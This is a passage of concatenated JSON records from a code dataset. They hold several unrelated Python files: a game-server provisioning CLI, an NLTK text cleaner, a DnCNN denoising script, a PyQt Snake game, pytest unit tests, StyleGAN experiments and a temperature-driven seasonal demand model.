import pass_context\nfrom FusionCli.libs.GlobalAdmin import GlobalAdmin\nfrom FusionCli.config import GMAuthKey, GMLists, GameAreas, GlobalEnvFile, SlaveEnvFile\nfrom FusionCli.config import project_name, WorkingDir, ShareBandwidthId, Compose2Path\nfrom clouds.backend import EIPPool\nfrom clouds.backend import MachinePool, CC\nfrom FusionCli.libs.CiluPinYin import CiluPinYin, GenerateHostName\n\ndef GetGameIPInfo(GameServerName):\n \"\"\" 获取新服相关服的IP地址信息 \"\"\"\n Pool = {}\n\n MP = MachinePool()\n\n host = MP.Get(Remark=GameServerName)\n ip = host.IP\n eip = host.EIPs[0]\n Pool = ip, eip\n return Pool\n\ndef GMUrl(ctx, param, value):\n if value is None:\n for (k, v) in GMLists.items():\n if v.get(\"default\", False):\n value = k\n return GMLists[value].get(\"url\")\n\n\n@click.command(short_help=\"新服\")\n@click.option('--gm', '-g', callback=GMUrl, help=\"GM后台\",\n type=click.Choice(list(GMLists.keys())))\n# @click.option('--master', '-m', callback=SplitValue,\n# help=\"主服\", metavar=\"id-name\")\n# @click.option('--slave', '-s', callback=SplitValue, multiple=True,\n# help=\"子服\", metavar=\"id-name\")\n# @click.option('--mysqlrootpw', prompt=True, confirmation_prompt=False,\n# hide_input=True, help=\"数据库密码\")\n# @click.option('--eta', '-e', callback=EtaWithTZ, default=\"09:00:00\",\n# help=\"开始执行时间点, 默认为第二天9点\",\n# metavar='\"%Y-%m-%d %H:%M:%S\"')\n@click.option('--name', '-n', help=\"Name\")\n@click.option('--area', '-a', help=\"area id \")\n@pass_context\ndef cli(ctx, gm, name, area):\n Areas = area\n GameServerName = name\n ipinfo = GetGameIPInfo(GameServerName)\n\n for area in GameAreas:\n if area[0] == Areas:\n Areas = area\n if Areas in GameAreas:\n Path = Areas[5]\n\n GameIDRule = Areas[6]\n #UseEIP = Areas[7]\n MinId = GameIDRule[0]\n MaxId = GameIDRule[1]\n IdRule = GameIDRule[2]\n GameEnvPath = \"%s/%s/\" % (Compose2Path, Path)\n\n ctx.vlog(\"GameServerName is :%s\" % GameServerName)\n # Step1 = []\n Step1 = AddGame.s(gm,\n GMAuthKey,\n GameServerName=GameServerName,\n GameAreasId=Areas[0],\n MinId=MinId,\n MaxId=MaxId,\n IdRule=IdRule)\n Step1.delay()\n\n # time.sleep(5)\n GM = GlobalAdmin(Domain=gm, GMAuthKey=GMAuthKey)\n Server = GM.Get(GameServerName)\n GameServerId = Server.id\n Name = GenerateHostName(project_name, GameServerId, GameServerName)\n GameEnvName = \"%s-%s.env\" % (project_name.lower(), GameServerId)\n GameEnvFile = path.join(GameEnvPath, GameEnvName)\n\n ctx.vlog(\"GameServerId is : %d\" % GameServerId)\n\n # Step1 = []\n # Step1.append(NewGame.s(gm,\n # GMAuthKey,\n # HostName=Name,\n # GameServerName=GameServerName,\n # ProjectName=project_name,\n # ShareBandwidthId=ShareBandwidthId))\n # Step2.delay()\n #\n # Step3 = UpdateLists.s(gm, GMAuthKey, project_name=project_name)\n # Step3.delay()\n #\n #\n # Step4 = NewGameStep2.s(GameServerName=GameServerName,\n # WorkingDir=WorkingDir,\n # EIP=ipinfo[1],\n # HostIP=ipinfo[0],\n # HostName=Name,\n # ProjectName=project_name\n # )\n # Step4.delay()\n #\n # Step5 = Create_App.s(gm,\n # GMAuthKey,\n # GlobalEnvFile=GlobalEnvFile,\n # GameEnvFile=GameEnvFile,\n # SlaveEnvFile=SlaveEnvFile,\n # ProjectName=project_name,\n # GameServerName=GameServerName,\n # GameServerId=GameServerId,\n # eipaddr=ipinfo[1],\n # hostip=ipinfo[0]\n # )\n # Step5.delay()\n\n NewGameTasks = chain(\n # AddGame.si(\n # gm,\n # GMAuthKey,\n # GameServerName=GameServerName,\n # GameAreasId=Areas[0],\n # MinId=MinId,\n # MaxId=MaxId,\n # IdRule=IdRule),\n NewGame.s(\n gm,\n GMAuthKey,\n HostName=Name,\n GameServerName=GameServerName,\n ProjectName=project_name,\n ShareBandwidthId=ShareBandwidthId),\n UpdateLists.si(gm, GMAuthKey, project_name=project_name),\n NewGameStep2.s(GameServerName=GameServerName,\n WorkingDir=WorkingDir,\n EIP=ipinfo[1],\n HostIP=ipinfo[0],\n HostName=Name,\n ProjectName=project_name),\n Sleep.si(),\n Create_App.s(\n gm,\n GMAuthKey,\n GlobalEnvFile=GlobalEnvFile,\n GameEnvFile=GameEnvFile,\n SlaveEnvFile=SlaveEnvFile,\n ProjectName=project_name,\n GameServerName=GameServerName,\n GameServerId=GameServerId,\n eipaddr=ipinfo[1],\n hostip=ipinfo[0]),\n)\n\n NewGameTasks()\n\n # step1 = NewGame.s(\n # HostName=Name,\n # GameServerName=GameServerName,\n # ProjectName=project_name,\n # ShareBandwidthId=ShareBandwidthId)\n # step1.delay()\n","sub_path":"FusionCli/cli/NewGame.py","file_name":"NewGame.py","file_ext":"py","file_size_in_byte":6269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"526356353","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nxml文件结构:\n\n\n...\n\n...\n ... \n...\n\n\n\"\"\"\n\nfrom nltk.corpus import stopwords\nfrom nltk import stem\nimport nltk\nimport re\n\n\nclass DataCleaner:\n\n \"\"\"\n a processor for a single xml file\n \"\"\"\n\n def clean(self, doc):\n \"\"\"\n one doc is tokenized in a list words\n :param doc: an ele of self.docs\n :return:\n \"\"\"\n words = self.tokenize(doc)\n words = self.remove_line(words)\n words = self.remove_spaces(words)\n words = self.remove_stopwords(words)\n words = self.extract_stem(words)\n\n # for word in words:\n # print word \n\n return words\n\n @staticmethod\n def tokenize(doc):\n sens = nltk.sent_tokenize(doc)\n words = []\n for sen in sens:\n sen = sen.lower()\n words.extend(re.split(r'\\W+|\\d', sen))\n return words\n\n @staticmethod\n def remove_spaces(words):\n\n # pattern = re.compile(r'\\s+')\n\n # word_list = [word for word in words if not pattern.match(word)]\n\n ss = \" \".join(words)\n word_list = ss.strip().split()\n\n return word_list\n\n @staticmethod\n def remove_line(words):\n\n ss = \" \".join(words)\n word_list = ss.strip().split(\"_\")\n return word_list\n\n @staticmethod\n def remove_stopwords(words):\n\n english_stopwords = stopwords.words('english')\n word_list = [word for word in words if word not in english_stopwords]\n return word_list\n\n @staticmethod\n def extract_stem(words):\n word_list = [stem.PorterStemmer().stem(word) for word in words]\n return word_list\n","sub_path":"src/Preprocess/data_clean.py","file_name":"data_clean.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"309790463","text":"import os.path\nimport time\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.nn.modules.loss import _Loss\nfrom collections import OrderedDict\n\nfrom utils import utils_image as util\nfrom models.network_dncnn import DnCNN\n\n# parameters \nn_channels = 1\nmodel_pool = 'model_zoo'\ntestsets = 'testsets'\nmodel_name = 'dncnn_25'\nsigma = 25\ntestset_name = 'bsd68'\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ncriterion = nn.MSELoss(reduction='sum')\nlr = 1e-5\nepochs = 100\n\ntest_results = OrderedDict()\ntest_results['psnr_before'] = []\ntest_results['psnr_after'] = []\n\nmodel_path = os.path.join(model_pool, model_name+'.pth')\ntest_paths = os.path.join(testsets, testset_name)\ntest_paths = util.get_image_paths(test_paths)\n\n# training loop\nfor idx, img in enumerate(test_paths):\n \n start_time = time.time()\n\n # load model\n model = DnCNN(in_nc=n_channels, out_nc=n_channels, nc=64, nb=17, act_mode='R')\n model.load_state_dict(torch.load(model_path), strict=True)\n model = model.to(device)\n model.eval()\n\n # load test image \n img_name, ext = os.path.splitext(os.path.basename(img))\n x = util.imread_uint(img, n_channels=n_channels)\n orig_im = x.squeeze()\n x = util.uint2single(x)\n np.random.seed(seed=0) # for reproducibility\n y = x + np.random.normal(0, sigma/255., x.shape) # add gaussian noise\n y = util.single2tensor4(y)\n y = y.to(device)\n \n # denoise image using the universal network\n with torch.no_grad():\n x_ = model(y)\n\n # compute PSNR\n denoised_im = util.tensor2uint(x_)\n prev_psnr = util.calculate_psnr(denoised_im, orig_im, border=0)\n test_results['psnr_before'].append(prev_psnr)\n\n denoised = x_.view(x.shape[0], x.shape[1], 1)\n denoised = denoised.cpu()\n denoised = denoised.detach().numpy().astype(np.float32)\n\n # internal adaptation\n model.train()\n optimizer = optim.Adam(model.parameters(), lr=lr)\n for epoch in range(epochs):\n\n # add noise to the denoised image\n y2 = denoised + np.random.normal(0, sigma/255., x.shape)\n y2 = util.single2tensor4(y2)\n y2 = y2.to(device)\n\n\t # optimize using the denoised image + the noisy denoised image\n optimizer.zero_grad()\n loss = criterion(model(y2), x_)\n loss.backward()\n optimizer.step()\n \n # denoise the image again after adaptation\n model.eval()\n with torch.no_grad():\n x_ = model(y)\n\n denoised_im = util.tensor2uint(x_)\n psnr = util.calculate_psnr(denoised_im, orig_im, border=0)\n test_results['psnr_after'].append(psnr)\n\n elapsed_time = time.time() - start_time\n print('{:s} - Before adaptation - PSNR: {:.2f} dB; After adaptation - PSNR: {:.2f} dB.'.format(img_name+ext, prev_psnr, psnr))\n\navg_psnr_after = sum(test_results['psnr_after']) / len(test_results['psnr_after'])\navg_psnr_before = sum(test_results['psnr_before']) / len(test_results['psnr_before'])\n\nprint('Average PSNR: - Before adaptation: PSNR: {:.2f} dB; After adaptation: - PSNR: {:.2f} dB.'.format(avg_psnr_before,avg_psnr_after))","sub_path":"DnCNN_internal_adaptation.py","file_name":"DnCNN_internal_adaptation.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"352250947","text":"#!/usr/bin/python3\nimport sys\nfrom random import randrange\nfrom PyQt5 import QtWidgets, QtCore, QtGui\n\n# Initialize a new Qt Widget\nclass Snake(QtWidgets.QWidget):\n\tdef __init__(self):\n # Inherit the features of QWidget class\n\t\tsuper(Snake, self).__init__()\n # Print the window\n\t\tself.initUI()\n\n\tdef initUI(self):\n\t\tself.highscore = 0\n\t\tself.newGame()\n # Define the window background in hexadecimal\n\t\tself.setStyleSheet(\"QWidget { background: #A9F5D0 }\")\n\t\tself.setFixedSize(300, 300)\n\t\tself.setWindowTitle('Snake')\n\t\tself.show()\n\n\t# The custom timer repaint all the objects in the window\n # defined in newGame method\n\tdef timerEvent(self, event):\n\t\tif event.timerId() == self.timer.timerId():\n\t\t\tself.direction(self.lastKeyPress)\n\t\t\tself.repaint()\n\t\telse:\n\t\t\tQtWidgets.QFrame.timerEvent(self, event)\n\n # Executed at every milliseconds of the timer\n\tdef paintEvent(self, event):\n\t\tqp = QtGui.QPainter()\n\t\tqp.begin(self)\n # Print the score board\n\t\tself.scoreBoard(qp)\n # Put the food\n\t\tself.placeFood(qp)\n # Draw the snake\n\t\tself.drawSnake(qp)\n # Print an updated score\n\t\tself.scoreText(event, qp)\n # If game is over\n\t\tif self.isOver:\n\t\t\tself.gameOver(event, qp)\n\t\tqp.end()\n\n # Executed when there is a key press\n\tdef keyPressEvent(self, e):\n\t\tif not self.isPaused:\n # To avoid that the snake go backwards, we check the previous button\n\t\t\tif e.key() == QtCore.Qt.Key_Up and self.lastKeyPress != 'UP' and self.lastKeyPress != 'DOWN':\n\t\t\t\tself.direction(\"UP\")\n\t\t\t\tself.lastKeyPress = 'UP'\n\t\t\telif e.key() == QtCore.Qt.Key_Down and self.lastKeyPress != 'DOWN' and self.lastKeyPress != 'UP':\n\t\t\t\tself.direction(\"DOWN\")\n\t\t\t\tself.lastKeyPress = 'DOWN'\n\t\t\telif e.key() == QtCore.Qt.Key_Left and self.lastKeyPress != 'LEFT' and self.lastKeyPress != 'RIGHT':\n\t\t\t\tself.direction(\"LEFT\")\n\t\t\t\tself.lastKeyPress = 'LEFT'\n\t\t\telif e.key() == QtCore.Qt.Key_Right and self.lastKeyPress != 'RIGHT' and self.lastKeyPress != 'LEFT':\n\t\t\t\tself.direction(\"RIGHT\")\n\t\t\t\tself.lastKeyPress = 'RIGHT'\n # Take a break!\n\t\t\telif e.key() == QtCore.Qt.Key_P:\n\t\t\t\tself.pause()\n # The game is paused let's start\n\t\telif e.key() == QtCore.Qt.Key_P:\n\t\t\tself.start()\n\t\telif e.key() == QtCore.Qt.Key_Space:\n\t\t\tself.newGame()\n\t\telif e.key() == QtCore.Qt.Key_Escape:\n\t\t\tself.close()\n\n # Define the various variables\n\tdef newGame(self):\n # Default score\n\t\tself.score = 0\n # Initial snake position\n\t\tself.x = 12;\n\t\tself.y = 36;\n\t\tself.snakeArray = [[self.x, self.y], [self.x-12, self.y], [self.x-24, self.y]]\n # Define a first fake key press\n\t\tself.lastKeyPress = 'RIGHT'\n\t\tself.timer = QtCore.QBasicTimer()\n # Initial fake position for food\n\t\tself.foodx = 0\n\t\tself.foody = 0\n # Status of the game\n\t\tself.isPaused = False\n\t\tself.isOver = False\n\t\tself.FoodPlaced = False\n # The timer is executed every 100ms\n\t\tself.speed = 100\n\t\tself.start()\n\n\tdef start(self):\n\t\tself.isPaused = False\n # Set the timer\n\t\tself.timer.start(self.speed, self)\n # Let's do a repaint of the window\n\t\tself.update()\n \n\tdef pause(self):\n\t\tself.isPaused = True\n # We stop the time progressing\n\t\tself.timer.stop()\n # Let's do a repaint of the window\n\t\tself.update()\n\n\tdef checkStatus(self, x, y):\n # Check of the position of the snake is at the borders\n\t\tpos = y > 288 or x > 288 or x < 0 or y < 24\n # If the snake touched the borders or the window is full\n\t\tif pos or (self.snakeArray[0] in self.snakeArray[1:len(self.snakeArray)]):\n\t\t\tself.pause()\n\t\t\tself.isPaused = True\n\t\t\tself.isOver = True\n\t\t\treturn False\n # If the snake is at the same position of the food\n\t\telif self.y == self.foody and self.x == self.foodx:\n\t\t\tself.FoodPlaced = False\n\t\t\tself.score += 1\n\t\t\treturn True\n # Remove the last piece of the snake\n\t\tself.snakeArray.pop()\n\t\treturn True\n\n\tdef direction(self, dir):\n # Change the direction of the snake \n # Calculate the next pixel where will be\n\t\tif (dir == \"DOWN\" and self.checkStatus(self.x, self.y+12)):\n\t\t\tself.y += 12\n\t\telif (dir == \"UP\" and self.checkStatus(self.x, self.y-12)):\n\t\t\tself.y -= 12\n\t\telif (dir == \"RIGHT\" and self.checkStatus(self.x+12, self.y)):\n\t\t\tself.x += 12\n\t\telif (dir == \"LEFT\" and self.checkStatus(self.x-12, self.y)):\n\t\t\tself.x -= 12\n # Refresh the window\n\t\tself.repaint()\n # Save in memory the new snake position\n\t\tself.snakeArray.insert(0 ,[self.x, self.y])\n\n\t# Places the food when theres none on the board\n\tdef placeFood(self, qp):\n\t\tif self.FoodPlaced == False:\n\t\t\tself.foodx = randrange(24)*12\n\t\t\tself.foody = randrange(2, 24)*12\n # IF the new position is not where is the snake\n\t\t\tif not [self.foodx, self.foody] in self.snakeArray:\n\t\t\t\tself.FoodPlaced = True;\n # Draw the food and set the color\n\t\tqp.setBrush(QtGui.QColor(80, 180, 0, 160))\n\t\tqp.drawRect(self.foodx, self.foody, 12, 12)\n\n\t# Draws each piece of the snake\n\tdef drawSnake(self, qp):\n\t\tqp.setPen(QtCore.Qt.NoPen)\n # Draw the piece and set the color\n\t\tqp.setBrush(QtGui.QColor(255, 80, 0, 255))\n\t\tfor i in self.snakeArray:\n # For every piece position draw it\n\t\t\tqp.drawRect(i[0], i[1], 12, 12)\n\n\tdef scoreBoard(self, qp):\n # Design the board\n\t\tqp.setPen(QtCore.Qt.NoPen)\n\t\tqp.setBrush(QtGui.QColor(25, 80, 0, 160))\n\t\tqp.drawRect(0, 0, 300, 24)\n\n\tdef scoreText(self, event, qp):\n\t\tqp.setPen(QtGui.QColor(255, 255, 255))\n\t\tqp.setFont(QtGui.QFont('Decorative', 10))\n # The first 2 numers are the pixel position for the text\n # We need to convert the score as string to print it\n\t\tqp.drawText(8, 17, \"SCORE: \" + str(self.score))\n\t\tqp.drawText(200, 17, \"HIGHSCORE: \" + str(self.highscore))\n\n\tdef gameOver(self, event, qp):\n # Compare the actual score with the maximum and get it\n\t\tself.highscore = max(self.highscore, self.score)\n\t\tqp.setPen(QtGui.QColor(0, 34, 3))\n\t\tqp.setFont(QtGui.QFont('Decorative', 10))\n\t\tqp.drawText(event.rect(), QtCore.Qt.AlignCenter, \"GAME OVER\")\n\t\tqp.setFont(QtGui.QFont('Decorative', 8))\n\t\tqp.drawText(90, 170, \"press space to play again\")\n\n# Classic way to execute a python class\ndef main():\n # Create a new QT app empty\n\tapp = QtWidgets.QApplication(sys.argv)\n # Run on this app our class\n\tex = Snake()\n # If the window is trying to getting closed kill the app\n\tsys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"pyqt_snake.py","file_name":"pyqt_snake.py","file_ext":"py","file_size_in_byte":6393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"557765597","text":"import pytest\n\n\nfrom zig.interact import Interact, InteractOut \nfrom zig.interact.interact_in import InteractIn\nfrom zig.html_components import *\n\n\nclass TestInteractBlackBox:\n \"\"\"\n Basic methods: \n 0. Able to create Interact object with specs [IMPT!]\n\n 1. Store all input elements and their specs\n 2. Store all output elements and their specs\n 3. Store callback function \n 4. Create API point\n\n 5. Render Interaction as JSON [IMPT!]\n\n REST methods:\n 1. update input value \n 2. generate output value \n\n 3. Handle GET Request\n 4. Handle POST/PUT Request\n\n \"\"\"\n\n @pytest.fixture\n def fixture_normal_parameters(self):\n # SETUP testing parameters for Mock InteractIn and InteractOut\n para_dict = [\"id\", \"value\", \"attribute\", \"dom_type\"] \n\n # input 1: HtmlElement of type Input, value, id='456'\n input1 = [\"456\", 3, \"value\", Input().dom_type]\n input1_dict = {i:x for i, x in zip(para_dict, input1)}\n \n # input 2: HtmlElement of type Div, content, id='123'\n input2 = [\"123\", \"test_value\", \"content\", Div().dom_type]\n input2_dict = {i:x for i, x in zip(para_dict, input2)}\n\n # ouput 3: HtmlElement of type P, content, id='678'\n output = [\"678\", \"\", \"content\", P().dom_type]\n output_dict = {i:x for i, x in zip(para_dict, output)} \n\n # just a placeholder\n callback = lambda x, y: x * y \n\n # NOTE: Might implement diff. format for diff. subclasses\n expected_api_point = \"/interact/{interaction_id}\"\n\n return {\"in1\":input1_dict, \"in2\":input2_dict, \n \"out\":output_dict, \"callback\": callback, \n \"api_point\": expected_api_point, \"parameters\":para_dict}\n \n\n @pytest.fixture\n def fixture_normal_ini(self, mocker, fixture_normal_parameters): \n # TEST initialization of Interact \n\n input1, input2, output, callback, \\\n api_point_format, para_dict = fixture_normal_parameters.values() \n\n \n mock_input1 = mocker.patch(\"zig.interact.InteractIn\", \n spec=True, \n identity=input1[\"id\"], \n attribute=input1[\"attribute\"], \n value=input1[\"value\"], \n dom_type=input1[\"dom_type\"],\n key=None)\n\n mock_input2 = mocker.Mock(spec=InteractIn, \n identity=input2[\"id\"],\n attribute=input2[\"attribute\"], \n value=input2[\"value\"], \n dom_type=input2[\"dom_type\"],\n key=None)\n\n mock_output = mocker.patch(\"zig.interact.InteractOut\", \n spec=True, \n identity=output[\"id\"], \n attribute=output[\"attribute\"], \n value=output[\"value\"], \n dom_type=output[\"dom_type\"])\n\n interaction = Interact( [mock_input1, mock_input2],\n mock_output, \n callback)\n\n return interaction\n\n \n # blackbox: doesn't need to know how inputs are stored\n def test_input_args(self, fixture_normal_ini, fixture_normal_parameters):\n # TEST that all input elements and their specifications are stored,\n # and can be retrieved. CHECK: inputs_args \n interaction = fixture_normal_ini \n expected_arguments = [ fixture_normal_parameters[\"in1\"][\"value\"], fixture_normal_parameters[\"in2\"][\"value\"] ]\n\n assert interaction.inputs_args == expected_arguments\n\n\n def test_input_keyword_args(self, fixture_normal_ini):\n # TEST that all input elements can be stored along with their keywords\n # and can be retrieved as such. CHECK: inputs_kwargs \n pass\n\n\n def test_output_elements(self, fixture_normal_ini, fixture_normal_parameters):\n # TEST that all output elements and their specs are stored,\n # and can be retrieved. CHECK: output_dict \n\n interaction = fixture_normal_ini\n output = fixture_normal_parameters[\"out\"]\n expected_output_data = None\n\n # NOTE: might implement diff. format for diff. subclass\n expected_output_elements = {output[\"id\"]: { \n \"attribute\": output[\"attribute\"],\n \"dom_type\": output[\"dom_type\"],\n \"data\": expected_output_data \n } } \n # it produces an Ordered Dict\n assert dict(interaction.output_dict) == expected_output_elements \n\n\n \n def test_generate_api_point(self, fixture_normal_ini, fixture_normal_parameters):\n # TEST that it will auto-generate a url for api\n # CHECK: api_point \n\n api_point_format = fixture_normal_parameters[\"api_point\"]\n interaction = fixture_normal_ini\n expected_api_point = api_point_format.format(interaction_id=interaction.id)\n\n assert interaction.api_point == expected_api_point \n\n\n # NOTE: IMPT it combines a few of the previous tests\n def test_rendering(self, fixture_normal_ini, fixture_normal_parameters):\n # given in and out, able to render into dict object (json-like)\n interaction = fixture_normal_ini\n inputs = [fixture_normal_parameters[\"in1\"], fixture_normal_parameters[\"in2\"]]\n output = [fixture_normal_parameters[\"out\"]]\n\n input_dict = {i:{\"id\":v[\"id\"] , \"dom_type\":v[\"dom_type\"], \"attribute\":v[\"attribute\"]} \n for i,v in enumerate(inputs) }\n\n output_dict = {i:{\"id\":v[\"id\"] , \"dom_type\":v[\"dom_type\"], \"attribute\":v[\"attribute\"]} \n for i,v in enumerate(output) }\n\n test_generate_api_point = fixture_normal_parameters[\"api_point\"] \\\n .format(interaction_id=interaction.id)\n\n\n expected_json = {\"input\": input_dict, \"output\": output_dict, \"api_point\": test_generate_api_point}\n \n \n #NOTE: Interact Object will trigger render on each In and Out Object\n\n assert interaction.render() == expected_json \n\n\n def test_update_single_input(self, fixture_normal_ini, fixture_normal_parameters):\n # TEST update of single input value from input 2\n \n interaction = fixture_normal_ini \n\n # input 2: HtmlElement of type Div, content, id='123'\n new_value = \"this is a test value\" \n new_input2 = [\"123\", \"content\", new_value, \"div\"]\n\n\n input2_dict = {i:x for i, x in zip(fixture_normal_parameters[\"parameters\"], new_input2)}\n \n expected_input_values = [fixture_normal_parameters[\"in1\"][\"value\"], new_input2[2]]\n\n #TODO: this is incomplete. Need a better way to push update\n assert interaction._update_single_input(*new_input2[:3]) is True\n assert interaction.inputs_args == expected_input_values\n\n \n def test_process_inputs_generate_output(self, fixture_normal_ini, fixture_normal_parameters):\n # NOTE: NEED TO change test\n # TEST that it is able to generate new output value from callback with input values\n interaction = fixture_normal_ini\n\n expected_output = fixture_normal_parameters[\"in1\"][\"value\"] * fixture_normal_parameters[\"in2\"][\"value\"]\n result = interaction._process_inputs()\n\n assert result == expected_output\n\n\n def test_update_output_values(self):\n # TEST output is generated and updated: \n pass\n\n\n\n def test_update_via_put(self, fixture_normal_ini, fixture_normal_parameters):\n # TEST update of put response\n interaction = fixture_normal_ini \n\n # given dictionary response from external source for input 1\n updated_value = \"Hello world!\" \n json_response = { 0:{\"type\":\"div\" ,\"id\":\"123\" , \"data\":updated_value, \"attribute\":\"content\"}}\n expected_args = [fixture_normal_parameters[\"in1\"][\"value\"], updated_value]\n\n # api-point will trigger this function\n interaction.put_response(json_response)\n \n assert interaction.__compile_args() == expected_args\n\n\n \n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n\n\n","sub_path":"tests/unit/test_interact.py","file_name":"test_interact.py","file_ext":"py","file_size_in_byte":8484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"239253798","text":"import torch\nimport numpy as np\nfrom module.net import Generator, Mapping, Discriminator\nfrom torchvision.utils import save_image\nimport torchvision\nfrom torch.nn import functional as F\n\n#------------------随机数设置--------------\ndef set_seed(seed):\n np.random.seed(seed)\n #random.seed(seed)\n torch.manual_seed(seed) # cpu\n torch.cuda.manual_seed_all(seed) # gpu\n torch.backends.cudnn.deterministic = True\n\n#-------测试G和pgE在PG下的分辨率情况------------\n# G = Generator(startf=16, maxf=512, layer_count=9, latent_size=512, channels=3)\n# G.load_state_dict(torch.load('./pre-model/Gs_dict.pth'))\n# Gm = Mapping(num_layers=18, mapping_layers=8, latent_size=512, dlatent_size=512, mapping_fmaps=512)\n# Gm.load_state_dict(torch.load('./pre-model/Gm_dict.pth')) \n\n# i=9\n# lod = 8\n# set_seed(i)\n# latents = torch.randn(5, 512)\n\n# with torch.no_grad():\n# \tlatents = Gm(latents) \n# \timg = G.forward(latents,lod=lod) # lod = 8 -> 1024\n# save_image((img+1)/2, 'lod%d.png'%lod)\n\n\n# E = BE.BE()\n# print(img.shape)\n# c, w = E(img,block_num=lod+1)\n# print(c.shape)\n# print(w.shape)\n\n#-----------测试不同结构BE的pre-model加载情况\n\n#import module.BE as BE\n# import module.BE_v2 as BE\n# E = BE.BE()\n\n# # #E.load_state_dict(torch.load('/Users/apple/Desktop/myStyle/StyleGAN-v1/E_model_ep30000.pth',map_location=torch.device('cpu')),strict=False)\n\n# # #先分析两个模型的keys差异\n# pretrained_dict = torch.load('/Users/apple/Desktop/myStyle/StyleGAN-v1/pre-model/v6_2_E_model_ep10000.pth',map_location=torch.device('cpu'))\n# model_dict = E.state_dict()\n\n# #查找包含的差异keys的字符\n# for k,v in model_dict.items():\n# \tif '2' in k and 'conv' not in k:\n# \t\tprint(k)\n# \t\tpretrained_dict.pop(k)\n\n# for k,v in model_dict.items():\n# \tif ('2' in k and 'conv' not in k) or ('inver_mod1' in k):\n# \t\tpretrained_dict.pop(k)\n\n# model_dict.update(pretrained_dict)\n# E.load_state_dict(model_dict,strict=False) # strict=False\n\n# del pretrained_dict\n# del model_dict\n\n# # 更新\n# model_dict.update(pretrained_dict)\n# E.load_state_dict(model_dict,strict=False) # strict=False\n\n# with torch.no_grad():\n# \tlatents = Gm(latents) \n# \timg1 = G.forward(latents,lod=lod)\n# \tc, w = E(img1,block_num=lod+1)\n# \timg2 = G.forward(w,lod=lod)\n\n# img = torch.cat((img1,img2))\n# save_image((img+1)/2, 'ED_lod%d_i%d.png'%(lod,i),nrow=5)\n\n\n#---------------多种插值的上下采样方式--------\n# from torch.nn import functional as F\n\n# #img2_1 = F.interpolate(img,[256,256],mode='bilinear')\n# img2_2 = F.avg_pool2d(img,2,2)\n# #img2_3 = F.interpolate(img,[256,256])\n\n# with torch.no_grad():\n# \tlatents = Gm(latents) \n# \timg1 = G.forward(latents,lod=lod)\n\n# save_image((img+1)/2, 'ED_lod%d_i%d.png'%(lod,i),nrow=5)\n\n#------------------裁剪区域----------------\nloader = torchvision.transforms.Compose([torchvision.transforms.ToTensor()])\n\nfrom PIL import Image\ndef image_loader(image_name):\n\timage = Image.open(image_name).convert('RGB')\n\t#image = image.resize((1024,1024))\n\timage = loader(image).unsqueeze(0)\n\treturn image.to(torch.float)\n\nimg1=image_loader('./sample.png')\nimg1 = img1*2-1\nprint(img1.shape)\nimg1 = F.avg_pool2d(img1,2,2)\nprint(img1.shape)\nimg1 = F.avg_pool2d(img1,2,2)\nprint(img1.shape)\n\n# img2 = img[:,:,:,128:-128]\n# print(img2.shape)\n# img3 = F.avg_pool2d(img2,2,2)\n# print(img3.shape)\nsave_image((img1+1)/2, 'down256.png',nrow=1)\n\n\n\n\n","sub_path":"test/test_v3.py","file_name":"test_v3.py","file_ext":"py","file_size_in_byte":3371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"77589734","text":"def UniqueElements(a: list):\n res = []\n for i in range(len(a)):\n if a[i] not in a[i+1:] and a[i] not in a[:i]:\n res.append(a[i])\n return res\n\n\na = list(map(int, input().split()))\nprint(*UniqueElements(a))\n\n","sub_path":"uniqEl.py","file_name":"uniqEl.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"596533442","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nclass multiseasonal_temp(object):\n \"\"\"multiseasonal_temp\n\n Extends multiseasonal model to include temperature inputs.\n\n Models temperature effects via: \n D~ A_n[T_n-T]_{+} + A_p[T-T_p]_{+}, where\n []_{+} is only non-zero if its argument is non-zero.\n \"\"\"\n def __init__(self, l=0, b=0, s=np.zeros((2,24)), \\\n alpha=0.1, beta=0.1, gamma=np.zeros((2,2)), \\\n A0=2000, Ap=10, An=10,Tp=200, Tn=100):\n self.l=l\n self.b=b\n self.s=s\n self.alpha=alpha\n self.beta=beta\n #easiest to initialize via a single matrix.\n self.g00 = gamma[0,0]\n self.g01 = gamma[0,1]\n self.g10 = gamma[1,0]\n self.g11 = gamma[1,1]\n #temperature model parameters.\n self.Ap = Ap\n self.An = An\n self.Tp = Tp\n self.Tn = Tn\n self.smooth_names=['alpha','beta','g00','g01','g10','g11']\n self.temp_names=['An','Ap','Tn','Tp']\n self.names=self.smooth_names+self.temp_names\n self.save_opt_param()\n\n def gamma(self):\n \"\"\"gamma(self)\n Compute matrix of smoothing coefficients from instance\n variables. Allows sim to update each one algorthimically\n for numerical derivatives.\n \"\"\"\n gamma=np.array([[self.g00,self.g01],[self.g10,self.g11]])\n return gamma\n\n def Tmodel(self,T):\n \"\"\"Tmodel\n Computes temperature component of demand.\n Fits two rectified linear models (one for high temp),\n one for low.\n DT ~ Ap [T-Tp]_{+} + An[Tn-T]_{+}\n \"\"\"\n m1 = T>self.Tp\n m2 = T=5\n #select out weekends, and regular days. \n y_end = ysub[s2]\n y_week= ysub[~s2]\n n1 = int(len(y_week)/24)\n n2 = int(len(y_end)/24)\n self.s = np.zeros((2,24))\n for n in range(n1):\n self.s[0,:] = self.s[0,:]+y_week[n*24:(n+1)*24]/n1\n for n in range(n2):\n self.s[1,:] = 